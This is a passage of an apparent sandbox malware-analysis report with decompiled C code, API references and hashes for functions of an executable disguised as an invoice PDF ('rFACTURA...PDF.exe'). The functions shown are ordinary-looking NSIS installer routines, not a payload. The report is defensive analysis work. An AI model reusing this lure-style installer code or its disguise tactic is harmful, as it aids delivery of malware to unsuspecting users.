					_t69 =  *0x7a0ef8; // 0xb7d614
					_t29 = _t69 + 0x14; // 0xb7d628
					_t116 = _t29;
					__eflags =  *_t116 & 0x00000020;
					if(( *_t116 & 0x00000020) == 0) {
						goto L27;
					}
					_t108 =  *_t116 & 0xfffffffe | SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
					__eflags = _t108;
					 *_t116 = _t108;
					E00404216(SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
					E0040461C();
					goto L13;
				} else {
					_t117 = _a16;
					_t75 =  *(_t117 + 0x30);
					if(_t75 < 0) {
						_t111 =  *0x7a79fc; // 0xb8007e
						_t75 =  *(_t111 - 4 + _t75 * 4);
					}
					_t76 =  *0x7a8a78 + _t75 * 2;
					_t110 =  *_t76 & 0x0000ffff;
					_a8 = _t110;
					_t78 =  &(_t76[1]);
					_a16 = _t78;
					_v16 = _t78;
					_v12 = 0;
					_v8 = E00404342;
					if(_t110 != 2) {
						_v8 = E00404308;
					}
					_push( *((intOrPtr*)(_t117 + 0x34)));
					_push(0x22);
					E004041F4(_a4);
					_push( *((intOrPtr*)(_t117 + 0x38)));
					_push(0x23);
					E004041F4(_a4);
					CheckDlgButton(_a4, (0 | ( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, "true");
					E00404216( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001);
					_t118 = GetDlgItem(_a4, 0x3e8);
					E00404229(_t118);
					SendMessageW(_t118, 0x45b, "true", 0);
					_t92 =  *( *0x7a8a34 + 0x68);
					if(_t92 < 0) {
						_t92 = GetSysColor( ~_t92);
					}
					SendMessageW(_t118, 0x443, 0, _t92);
					SendMessageW(_t118, 0x445, 0, 0x4010000);
					SendMessageW(_t118, 0x435, 0, lstrlenW(_a16));
					 *0x79feec = 0;
					SendMessageW(_t118, 0x449, _a8,  &_v16);
					 *0x79feec = 0;
					return 0;
				}
			}

0x004043a3
0x004044c3
0x004044d0
0x0040452d
0x0040452d
0x00404531
0x004045f7
0x004045fe
0x00404600
0x00404600
0x00404600
0x00404606
0x00404606
0x00404609
0x00000000
0x00404610
0x0040453f
0x00404545
0x00404548
0x0040454f
0x00404551
0x00404558
0x0040455a
0x0040455d
0x00404560
0x00404565
0x0040456b
0x0040456e
0x00404575
0x00404582
0x00404593
0x00404599
0x004045a1
0x004045af
0x004045b5
0x004045b5
0x00404575
0x00404558
0x004045b8
0x004045bf
0x00000000
0x004045c1
0x004045c1
0x004045c8
0x00000000
0x00000000
0x004045ca
0x004045ce
0x004045de
0x004045de
0x004045e0
0x004045e4
0x004045f0
0x004045f0
0x00000000
0x004045f4
0x004045bf
0x004044d8
0x004044db
0x00000000
0x00000000
0x004044e1
0x004044e7
0x00000000
0x00000000
0x004044ed
0x004044f2
0x004044f2
0x004044f5
0x004044f8
0x00000000
0x00000000
0x0040451f
0x0040451f
0x00404521
0x00404523
0x00404528
0x00000000
0x004043a9
0x004043a9
0x004043ac
0x004043b1
0x004043b3
0x004043c2
0x004043c2
0x004043ca
0x004043cd
0x004043d1
0x004043d4
0x004043d8
0x004043db
0x004043de
0x004043e1
0x004043e8
0x004043ea
0x004043ea
0x004043f4
0x00404401
0x0040440b
0x00404410
0x00404413
0x00404418
0x0040442f
0x00404436
0x00404449
0x0040444c
0x00404460
0x00404467
0x0040446c
0x00404471
0x00404471
0x0040447f
0x0040448d
0x0040449f
0x004044a4
0x004044b4
0x004044b6
0x00000000
0x004044bc

APIs

CheckDlgButton.USER32(?,-0000040A,?), ref: 0040442F
GetDlgItem.USER32(?,000003E8), ref: 00404443
SendMessageW.USER32(00000000,0000045B,?,00000000), ref: 00404460
GetSysColor.USER32(?), ref: 00404471
SendMessageW.USER32(00000000,00000443,00000000,?), ref: 0040447F
SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040448D
lstrlenW.KERNEL32(?), ref: 00404492
SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040449F
SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004044B4
GetDlgItem.USER32(?,0000040A), ref: 0040450D
SendMessageW.USER32(00000000), ref: 00404514
GetDlgItem.USER32(?,000003E8), ref: 0040453F
SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404582
LoadCursorW.USER32(00000000,00007F02), ref: 00404590
SetCursor.USER32(00000000), ref: 00404593
LoadCursorW.USER32(00000000,00007F00), ref: 004045AC
SetCursor.USER32(00000000), ref: 004045AF
SendMessageW.USER32(00000111,?,00000000), ref: 004045DE
SendMessageW.USER32(00000010,00000000,00000000), ref: 004045F0

Strings

Call, xrefs: 0040456E
N, xrefs: 0040452D

Memory Dump Source

Source File: 00000000.00000002.1411782168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1411716682.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411876056.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007EF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rFACTURA_FAC_2023_1-1000733.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
String ID: Call$N
API String ID: 3103080414-3438112850
Opcode ID: 631cabfc39bdc86844b6c5ef759f4df1482c42644a70fa64dc4549b5ea516eb1
Instruction ID: 51cb052740ae368b0964ded38bc47e0fd82963d20e12a5d8f79ead0afd290bbe
Opcode Fuzzy Hash: 631cabfc39bdc86844b6c5ef759f4df1482c42644a70fa64dc4549b5ea516eb1
Instruction Fuzzy Hash: 636190B1900209BFDB10DF60DD45AAA7B69FB85344F00853AF705B61E0DB7DA951CF98

Uniqueness

Uniqueness Score: -1.00%

Function 00401000 Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 125
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x7a8a34;
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectW( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, "true");
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextW(_t128, "Tophyperidrosis Setup", 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					 *((intOrPtr*)(_t102 + 4)) =  *0x7a8a28;
				}
				return DefWindowProcW(_a4, _a8, _a12, _t102);
			}

0x0040100a
0x00401039
0x00401047
0x0040104d
0x00401051
0x0040105b
0x00401061
0x00401064
0x004010f3
0x00401089
0x0040108c
0x004010a6
0x004010bd
0x004010cc
0x004010cf
0x004010d5
0x004010d9
0x004010e4
0x004010ed
0x004010ef
0x004010ef
0x00401100
0x00401105
0x0040110d
0x00401110
0x00401112
0x00401118
0x0040111f
0x00401126
0x00401130
0x00401142
0x00401156
0x00401160
0x00401165
0x00401165
0x00401110
0x0040116e
0x00000000
0x00401178
0x00401010
0x00401013
0x00401015
0x0040101f
0x0040101f
0x00000000

APIs

DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32(00000000,?,00000000), ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectW.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,?), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextW.USER32(00000000,Tophyperidrosis Setup,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

Tophyperidrosis Setup, xrefs: 00401150
F, xrefs: 0040100C

Memory Dump Source

Source File: 00000000.00000002.1411782168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1411716682.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411876056.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007EF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rFACTURA_FAC_2023_1-1000733.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F$Tophyperidrosis Setup
API String ID: 941294808-1119424813
Opcode ID: 218f2c87b148b58c94c6785b51cf5afc075c1faf60bc5df3e6f759b2377d660f
Instruction ID: 0958fbfe94b1809001ec2c76305b3cf500f7264b01c73c256976ee1787a3906e
Opcode Fuzzy Hash: 218f2c87b148b58c94c6785b51cf5afc075c1faf60bc5df3e6f759b2377d660f
Instruction Fuzzy Hash: B1418C71800209AFCF058F95DE459AF7BB9FF45310F00842AF591AA1A0CB38D954DFA4

Uniqueness

Uniqueness Score: -1.00%

Function 00405EAB Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 130
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405EAB(void* __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t12;
				long _t24;
				char* _t31;
				int _t37;
				void* _t38;
				intOrPtr* _t39;
				long _t42;
				WCHAR* _t44;
				void* _t46;
				void* _t48;
				void* _t49;
				void* _t52;
				void* _t53;

				_t38 = __ecx;
				_t44 =  *(_t52 + 0x14);
				 *0x7a55c0 = 0x55004e;
				 *0x7a55c4 = 0x4c;
				if(_t44 == 0) {
					L3:
					_t12 = GetShortPathNameW( *(_t52 + 0x1c), 0x7a5dc0, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						_t37 = wsprintfA(0x7a51c0, "%ls=%ls\r\n", 0x7a55c0, 0x7a5dc0);
						_t53 = _t52 + 0x10;
						E00406281(_t37, 0x400, 0x7a5dc0, 0x7a5dc0,  *((intOrPtr*)( *0x7a8a34 + 0x128)));
						_t12 = E00405D51(0x7a5dc0, 0xc0000000, "true");
						_t48 = _t12;
						 *(_t53 + 0x18) = _t48;
						if(_t48 != 0xffffffff) {
							_t42 = GetFileSize(_t48, 0);
							_t6 = _t37 + 0xa; // 0xa
							_t46 = GlobalAlloc(0x40, _t42 + _t6);
							if(_t46 == 0 || E00405DD4(_t48, _t46, _t42) == 0) {
								L18:
								return CloseHandle(_t48);
							} else {
								if(E00405CB6(_t38, _t46, "[Rename]\r\n") != 0) {
									_t49 = E00405CB6(_t38, _t21 + 0xa, "\n[");
									if(_t49 == 0) {
										_t48 =  *(_t53 + 0x18);
										L16:
										_t24 = _t42;
										L17:
										E00405D0C(_t24 + _t46, 0x7a51c0, _t37);
										SetFilePointer(_t48, 0, 0, 0);
										E00405E03(_t48, _t46, _t42 + _t37);
										GlobalFree(_t46);
										goto L18;
									}
									_t39 = _t46 + _t42;
									_t31 = _t39 + _t37;
									while(_t39 > _t49) {
										 *_t31 =  *_t39;
										_t31 = _t31 - 1;
										_t39 = _t39 - 1;
									}
									_t24 = _t49 - _t46 + 1;
									_t48 =  *(_t53 + 0x18);
									goto L17;
								}
								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
								_t42 = _t42 + 0xa;
								goto L16;
							}
						}
					}
				} else {
					CloseHandle(E00405D51(_t44, 0, "true"));
					_t12 = GetShortPathNameW(_t44, 0x7a55c0, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						goto L3;
					}
				}
				return _t12;
			}

0x00405eab
0x00405eb4
0x00405ebb
0x00405ec5
0x00405ed9
0x00405f01
0x00405f0c
0x00405f10
0x00405f30
0x00405f37
0x00405f41
0x00405f4e
0x00405f53
0x00405f58
0x00405f5c
0x00405f6b
0x00405f6d
0x00405f7a
0x00405f7e
0x00406019
0x00000000
0x00405f94
0x00405fa1
0x00405fc5
0x00405fc9
0x00405fe8
0x00405fec
0x00405fec
0x00405fee
0x00405ff7
0x00406002
0x0040600d
0x00406013
0x00000000
0x00406013
0x00405fcb
0x00405fce
0x00405fd9
0x00405fd5
0x00405fd7
0x00405fd8
0x00405fd8
0x00405fe0
0x00405fe2
0x00000000
0x00405fe2
0x00405fac
0x00405fb2
0x00000000
0x00405fb2
0x00405f7e
0x00405f5c
0x00405edb
0x00405ee6
0x00405eef
0x00405ef3
0x00000000
0x00000000
0x00405ef3
0x00406024

APIs

CloseHandle.KERNEL32(00000000,?,00000000,?,?,00000000,?,?,00406046,?,?), ref: 00405EE6
GetShortPathNameW.KERNEL32(?,007A55C0,00000400), ref: 00405EEF

Part of subcall function 00405CB6: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405F9F,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CC6
Part of subcall function 00405CB6: lstrlenA.KERNEL32(00000000,?,00000000,00405F9F,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CF8

GetShortPathNameW.KERNEL32(?,007A5DC0,00000400), ref: 00405F0C
wsprintfA.USER32 ref: 00405F2A
GetFileSize.KERNEL32(00000000,00000000,007A5DC0,C0000000,?,007A5DC0,?,?,?,?,?), ref: 00405F65
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405F74
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FAC
SetFilePointer.KERNEL32(0040A560,00000000,00000000,00000000,00000000,007A51C0,00000000,-0000000A,0040A560,00000000,[Rename],00000000,00000000,00000000), ref: 00406002
GlobalFree.KERNEL32(00000000), ref: 00406013
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0040601A

Part of subcall function 00405D51: GetFileAttributesW.KERNELBASE(?,00402F01,C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D55
Part of subcall function 00405D51: CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405D77

Strings

%ls=%ls, xrefs: 00405F20
[Rename], xrefs: 00405F94, 00405FA6

Memory Dump Source

Source File: 00000000.00000002.1411782168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1411716682.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411876056.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007EF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rFACTURA_FAC_2023_1-1000733.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
String ID: %ls=%ls$[Rename]
API String ID: 2171350718-461813615
Opcode ID: 1f2b66d66530b4cdd3a0434c0d3521a5c22e25164d410e4764023a67e6413042
Instruction ID: 89c32d2153287748ec41ed641a28e9b16702ce233dbd70bd77460b6709aa78c6
Opcode Fuzzy Hash: 1f2b66d66530b4cdd3a0434c0d3521a5c22e25164d410e4764023a67e6413042
Instruction Fuzzy Hash: F8312871601B05BBD220AB619D48F6B3A9CEF85744F14003EFA42F62D2DA7CD8118ABD

Uniqueness

Uniqueness Score: -1.00%

Function 004064F3 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E004064F3(WCHAR* _a4) {
				short _t5;
				short _t7;
				WCHAR* _t19;
				WCHAR* _t20;
				WCHAR* _t21;

				_t20 = _a4;
				if( *_t20 == 0x5c && _t20[1] == 0x5c && _t20[2] == 0x3f && _t20[3] == 0x5c) {
					_t20 =  &(_t20[4]);
				}
				if( *_t20 != 0 && E00405BA7(_t20) != 0) {
					_t20 =  &(_t20[2]);
				}
				_t5 =  *_t20;
				_t21 = _t20;
				_t19 = _t20;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((short*)(E00405B5D(L"*?|<>/\":", _t5))) == 0) {
							E00405D0C(_t19, _t20, CharNextW(_t20) - _t20 >> 1);
							_t19 = CharNextW(_t19);
						}
						_t20 = CharNextW(_t20);
						_t5 =  *_t20;
					} while (_t5 != 0);
				}
				 *_t19 =  *_t19 & 0x00000000;
				while(1) {
					_push(_t19);
					_push(_t21);
					_t19 = CharPrevW();
					_t7 =  *_t19;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t19 =  *_t19 & 0x00000000;
					if(_t21 < _t19) {
						continue;
					}
					break;
				}
				return _t7;
			}

0x004064f5
0x004064fe
0x00406515
0x00406515
0x0040651c
0x00406528
0x00406528
0x0040652b
0x0040652e
0x00406533
0x00406535
0x0040653e
0x00406542
0x0040655f
0x00406567
0x00406567
0x0040656c
0x0040656e
0x00406571
0x00406576
0x00406577
0x0040657b
0x0040657b
0x0040657c
0x00406583
0x00406585
0x0040658c
0x00000000
0x00000000
0x00406594
0x0040659a
0x00000000
0x00000000
0x00000000
0x0040659a
0x0040659f

APIs

CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe",0040332B,C:\Users\user\AppData\Local\Temp\,76F93420,0040359C,?,00000006,00000008,0000000A), ref: 00406556
CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 00406565
CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe",0040332B,C:\Users\user\AppData\Local\Temp\,76F93420,0040359C,?,00000006,00000008,0000000A), ref: 0040656A
CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe",0040332B,C:\Users\user\AppData\Local\Temp\,76F93420,0040359C,?,00000006,00000008,0000000A), ref: 0040657D

Strings

"C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe", xrefs: 004064F3
*?|<>/":, xrefs: 00406545
C:\Users\user\AppData\Local\Temp\, xrefs: 004064F4, 004064F9

Memory Dump Source

Source File: 00000000.00000002.1411782168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1411716682.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411876056.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007EF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rFACTURA_FAC_2023_1-1000733.jbxd

Similarity

API ID: Char$Next$Prev
String ID: "C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
API String ID: 589700163-1355870568
Opcode ID: dac06de1e1615827748cce9690c43cbd9586789469f0d882438918906e4257c7
Instruction ID: b8c3cbf5b75eb2b2499c9cde9ef872d51aef5c2750dc7b0313243111e00abff4
Opcode Fuzzy Hash: dac06de1e1615827748cce9690c43cbd9586789469f0d882438918906e4257c7
Instruction Fuzzy Hash: 9B11C85580021275DB303B14BC40ABBA6F8EF59754F52403FE985732C8E77C5C9286BD

Uniqueness

Uniqueness Score: -1.00%

Function 0040425B Relevance: 12.1, APIs: 8, Instructions: 61
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040425B(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t35;
				long _t37;
				void* _t40;
				long* _t49;

				if(_a4 + 0xfffffecd > 5) {
					L15:
					return 0;
				}
				_t49 = GetWindowLongW(_a12, 0xffffffeb);
				if(_t49 == 0) {
					goto L15;
				}
				_t35 =  *_t49;
				if((_t49[5] & 0x00000002) != 0) {
					_t35 = GetSysColor(_t35);
				}
				if((_t49[5] & 0x00000001) != 0) {
					SetTextColor(_a8, _t35);
				}
				SetBkMode(_a8, _t49[4]);
				_t37 = _t49[1];
				_v16.lbColor = _t37;
				if((_t49[5] & 0x00000008) != 0) {
					_t37 = GetSysColor(_t37);
					_v16.lbColor = _t37;
				}
				if((_t49[5] & 0x00000004) != 0) {
					SetBkColor(_a8, _t37);
				}
				if((_t49[5] & 0x00000010) != 0) {
					_v16.lbStyle = _t49[2];
					_t40 = _t49[3];
					if(_t40 != 0) {
						DeleteObject(_t40);
					}
					_t49[3] = CreateBrushIndirect( &_v16);
				}
				return _t49[3];
			}

0x0040426d
0x00404301
0x00000000
0x00404301
0x0040427e
0x00404282
0x00000000
0x00000000
0x00404288
0x00404291
0x00404294
0x00404294
0x0040429a
0x004042a0
0x004042a0
0x004042ac
0x004042b2
0x004042b9
0x004042bc
0x004042bf
0x004042c1
0x004042c1
0x004042c9
0x004042cf
0x004042cf
0x004042d9
0x004042de
0x004042e1
0x004042e6
0x004042e9
0x004042e9
0x004042f9
0x004042f9
0x00000000

APIs

GetWindowLongW.USER32(?,000000EB), ref: 00404278
GetSysColor.USER32(00000000), ref: 00404294
SetTextColor.GDI32(?,00000000), ref: 004042A0
SetBkMode.GDI32(?,?), ref: 004042AC
GetSysColor.USER32(?), ref: 004042BF
SetBkColor.GDI32(?,?), ref: 004042CF
DeleteObject.GDI32(?), ref: 004042E9
CreateBrushIndirect.GDI32(?), ref: 004042F3

Memory Dump Source

Source File: 00000000.00000002.1411782168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1411716682.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411876056.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
